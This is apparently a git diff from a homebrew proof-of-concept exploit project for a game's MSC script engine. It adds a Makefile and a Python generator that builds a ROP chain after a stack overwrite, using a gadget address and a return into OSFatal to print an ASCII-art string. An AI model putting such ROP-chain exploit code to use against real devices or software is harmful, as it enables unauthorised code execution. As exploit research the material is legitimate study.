diff --git a/kexploit/generate_rop.py b/kexploit/generate_rop.py index b52fc27..6b15185 100644 --- a/kexploit/generate_rop.py +++ b/kexploit/generate_rop.py @@ -16,7 +16,7 @@ def writeEnd(): script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend" """ -Example payload +Example payload (writeOSFatalPayload func) pushInt. 0xC00C650 pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal) @@ -50,6 +50,7 @@ pushInt. 0x01031618 #return address (OSFatal) """ +# Print out contents of payload as null terminated string def writeOSFatalPayload(): write32(LOAD_R3_ADDR) writePayloadAddress() @@ -63,7 +64,9 @@ def main(): global script with open('rop_setup.s', 'r') as f: script = f.read() + writeOSFatalPayload() + with open("main.s", 'w') as f: f.write(script) diff --git a/poc/Makefile b/poc/Makefile new file mode 100644 index 0000000..e435e49 --- /dev/null +++ b/poc/Makefile @@ -0,0 +1,14 @@ +all: exploit.mscsb + +clean: + rm -f exploit.mscsb payload.s main.s + +exploit.mscsb: payload.s Scripts main.s + python3 ../pymsc/asm.py + +payload.s: payload.bin + python3 generate_payload.py + +main.s: rop_setup.s + python3 generate_rop.py + diff --git a/poc/Scripts b/poc/Scripts index 8e613f9..7500d16 100644 --- a/poc/Scripts +++ b/poc/Scripts @@ -1,3 +1,3 @@ -:script_0.txt -string.txt -|mario.mscsb +:main.s +payload.s +|exploit.mscsb diff --git a/poc/generate_string.py b/poc/generate_payload.py similarity index 50% rename from poc/generate_string.py rename to poc/generate_payload.py index c7fed5f..329b782 100644 --- a/poc/generate_string.py +++ b/poc/generate_payload.py @@ -1,4 +1,4 @@ -with open('string.bin', 'rb') as stringFile: - with open('string.txt', 'w') as f: +with open('payload.bin', 'rb') as stringFile: + with open('payload.s', 'w') as f: for byte in stringFile.read(): print('byte %s' % hex(byte), file=f) diff --git a/poc/generate_rop.py b/poc/generate_rop.py new file mode 100644 index 0000000..6b15185 --- /dev/null +++ b/poc/generate_rop.py @@ -0,0 +1,74 @@ + +# Addresses +LOAD_R3_ADDR = 0x0C00C650 +OSFATAL_ADDR = 0x01031618 + +def write32(u32): + global script + script += f"pushInt. {hex(u32)}\n" + +def writePayloadAddress(): + global script + script += "pushVar. globalVar,mscScriptAddress\n" + +def writeEnd(): + global script + script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend" + +""" +Example payload (writeOSFatalPayload func) + +pushInt. 0xC00C650 +pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal) +pushInt. 0xBEEF0001 +pushInt. 0xBEEF0002 +pushInt. 0xBEEF0003 +pushInt. 0xBEEF0004 +pushInt. 0xBEEF0005 +pushInt. 0xBEEF0006 +pushInt. 0xBEEF0007 +pushInt. 0xBEEF0008 +pushInt. 0xBEEF0009 +pushInt. 0xBEEF000A +pushInt. 0xBEEF000B +pushInt. 0xBEEF000C +pushInt. 0xBEEF000D +pushInt. 0xBEEF000E +pushInt. 0xBEEF000F +pushInt. 0xBEEF0010 +pushInt. 0xBEEF0011 +pushInt. 0xBEEF0012 +pushInt. 0xBEEF0013 +pushInt. 0xBEEF0014 +pushInt. 0xBEEF0015 +pushInt. 0xBEEF0016 +pushInt. 0xBEEF0017 +pushInt. 0xBEEF0018 +pushInt. 0xBEEF0019 +pushInt. 0xBEEF001A +pushInt. 0x01031618 #return address (OSFatal) + +""" + +# Print out contents of payload as null terminated string +def writeOSFatalPayload(): + write32(LOAD_R3_ADDR) + writePayloadAddress() + for i in range(0x1A): + write32(0xBEEF0000 + i + 1) + write32(OSFATAL_ADDR) + writeEnd() + + +def main(): + global script + with open('rop_setup.s', 'r') as f: + script = f.read() + + writeOSFatalPayload() + + with open("main.s", 'w') as f: + f.write(script) + +if __name__ == "__main__": + main() diff --git a/poc/mario.mscsb b/poc/mario.mscsb deleted file mode 100644 index 2ed4688..0000000 Binary files a/poc/mario.mscsb and /dev/null differ diff --git a/poc/string.bin b/poc/payload.bin similarity index 100% rename from poc/string.bin rename to poc/payload.bin diff --git a/poc/script_0.txt b/poc/rop_setup.s similarity index 88% rename from poc/script_0.txt rename to poc/rop_setup.s index e63e5a7..79a1bb2 100644 --- a/poc/script_0.txt +++ b/poc/rop_setup.s @@ -758,39 +758,4 @@ pushShort. 0x80 #Now we can overwrite the stack position with the one we calculated earlier to jump to the write position pushVar. globalVar,calculatedStackPosition -#Write ROP chain -pushInt. 0xC00C650 -pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal) -pushInt. 0xBEEF0001 -pushInt. 0xBEEF0002 -pushInt. 0xBEEF0003 -pushInt. 0xBEEF0004 -pushInt. 0xBEEF0005 -pushInt. 0xBEEF0006 -pushInt. 0xBEEF0007 -pushInt. 0xBEEF0008 -pushInt. 0xBEEF0009 -pushInt. 0xBEEF000A -pushInt. 0xBEEF000B -pushInt. 0xBEEF000C -pushInt. 0xBEEF000D -pushInt. 0xBEEF000E -pushInt. 0xBEEF000F -pushInt. 0xBEEF0010 -pushInt. 0xBEEF0011 -pushInt. 0xBEEF0012 -pushInt. 0xBEEF0013 -pushInt. 0xBEEF0014 -pushInt. 0xBEEF0015 -pushInt. 0xBEEF0016 -pushInt. 0xBEEF0017 -pushInt. 0xBEEF0018 -pushInt. 0xBEEF0019 -pushInt. 0xBEEF001A -pushInt. 0x01031618 #return address (OSFatal) - -#Execute ROP chain -exit - -#Dunno why but I figured I might as well put it here, should never hit this though -end \ No newline at end of file +#Write ROP Chain diff --git a/poc/string.txt b/poc/string.txt deleted file mode 100644 index 848a549..0000000 --- a/poc/string.txt +++ /dev/null @@ -1,120 +0,0 @@ -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x5f -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x5f -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0xa -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x7c -byte 0x20 -byte 0x7c -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x7c -byte 0x20 -byte 0x7c -byte 0x20 -byte 0x20 -byte 0x20 -byte 0x20 -byte 0xa -byte 0x20 -byte 0x20 -byte 0x5f -byte 0x5f -byte 0x7c -byte 0x20 -byte 0x7c -byte 0x20 -byte 0x5f -byte 0x5f -byte 0x20 -byte 0x5f -byte 0x7c -byte 0x20 -byte 0x7c -byte 0x5f -byte 0x5f -byte 0x20 -byte 0x20 -byte 0xa -byte 0x20 -byte 0x2f -byte 0x20 -byte 0x5f -byte 0x60 -byte 0x20 -byte 0x7c -byte 0x2f -byte 0x20 -byte 0x5f -byte 0x60 -byte 0x20 -byte 0x7c -byte 0x20 -byte 0x27 -byte 0x5f -byte 0x20 -byte 0x5c -byte 0x20 -byte 0xa -byte 0x7c -byte 0x20 -byte 0x28 -byte 0x5f -byte 0x7c -byte 0x20 -byte 0x7c -byte 0x20 -byte 0x28 -byte 0x5f -byte 0x7c -byte 0x20 -byte 0x7c -byte 0x20 -byte 0x7c -byte 0x5f -byte 0x29 -byte 0x20 -byte 0x7c -byte 0xa -byte 0x20 -byte 0x5c -byte 0x5f -byte 0x5f -byte 0x2c -byte 0x5f -byte 0x7c -byte 0x5c -byte 0x5f -byte 0x5f -byte 0x2c -byte 0x5f -byte 0x7c -byte 0x5f -byte 0x2e -byte 0x5f -byte 0x5f -byte 0x2f -byte 0x20 -byte 0x0